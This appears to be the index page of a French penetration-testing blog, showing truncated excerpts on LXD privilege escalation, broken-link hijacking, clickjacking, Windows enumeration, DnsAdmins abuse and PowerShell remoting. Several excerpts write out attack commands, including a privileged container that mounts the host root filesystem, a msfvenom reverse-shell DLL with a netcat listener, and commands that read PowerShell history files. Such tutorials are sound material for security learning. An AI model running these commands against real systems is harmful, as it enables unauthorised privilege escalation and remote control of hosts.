Vulnérabilité LXC

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine chmod u+x build-alpine lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz –alias myimage lxd init alpine:v3.12 mypool lxc init myimage ignite -c security.privileged=true lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true lxc start ignite lxc exec ignite /bin/sh cd /mnt/root/root Le répertoire /mnt/root est le système de fichier root de l’hôte Il suffit maintenant de … Continuer la lecture

Hijackings de liens inexistants

Outil pour trouver des liens cassés https://github.com/stevenvachon/broken-link-checker.git blc -rof –filter-level 3 https://www.searchevolution.com Script pour trouver des domaines expirés dans les tweets https://github.com/misterch0c/twitterBFTD Resources : https://edoverflow.com/2017/broken-link-hijacking/ https://deadlinkchecker.com/website-dead-link-checker.asp Extension pour google chrome : Broken Link Checker

Clickjacking vulnerabilité

Façon manuelle de vérifier si un site est vulnérable à ce type de vulnérabilités Clickjacking testing Website is vulnerable to clickjacking! Vérification automatique pour la vulnérabilité clickjacking samy.pl/quickjack/quickjack.html https://www.securityheaders.com (vérifie pour les entêtes http pour la sécurité sont utilisés : Strict-Transport-Security, Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy) Interdire le chargement d’un site via iframe : X-Frame-Options … Continuer la lecture

Quelques commandes Windows pratiques pour l’énumération

Vous pouvez énumérer tout ce qui se trouve ici avec le logiciel WinPEAS, mais voici une idée de ce que l’on peut trouver d’intéressant avec ce logiciel. Variables d’environnement set dir env: Get-ChildItem Env: | ft Key,Value Historiques de commandes powershell ConsoleHost_history #Find the PATH where is saved type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\germa\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt cat … Continuer la lecture

Exploiter le compte d’un utilisateur faisant partie du groupe dnsadmins pour devenir administrateur

Si un utilisateur fait partie du groupe dnsadmins sur un DC, nous pouvons obtenir le compte administrateur de cette façon: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.11 LPORT=8888 -f dll > germain.dll nc -nlvp 8888 Vous pourriez tester la dll en la copiant sur le serveur Windows et en exécutant pour avoir un shell : rundll32.exe .\germain.dll,DnsPluginInitialize #DnsPluginInitialize … Continuer la lecture

Installer powershell sur linux et se connecter sur Windows

Si Evil-WinRm ne fonctionne pas car le port 5985 n’est pas ouvert : nous pouvons utiliser Powershell pour Linux pour se connecter. sudo apt install gss-ntlmssp sudo apt-get install powershell nc -nvlp 9001 pwsh $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential germain Enter-PSSession $offsec_session PS> &{ cd ../Desktop } PS> &{ ls } PS> … Continuer la lecture

Utilitaire smbclient

Souvent, le service SMB (Service Message Block) est disponible via le port TCP 445 lors d’une analyse. SMB est utilisé pour le partage de fichiers que ce soit sur Windows et Linux. Malheureusement, ce service possède plusieurs vulnérabilités connus. L’erreur la plus fréquente est un erreur de configuration qui permet à n’importe qui sans se … Continuer la lecture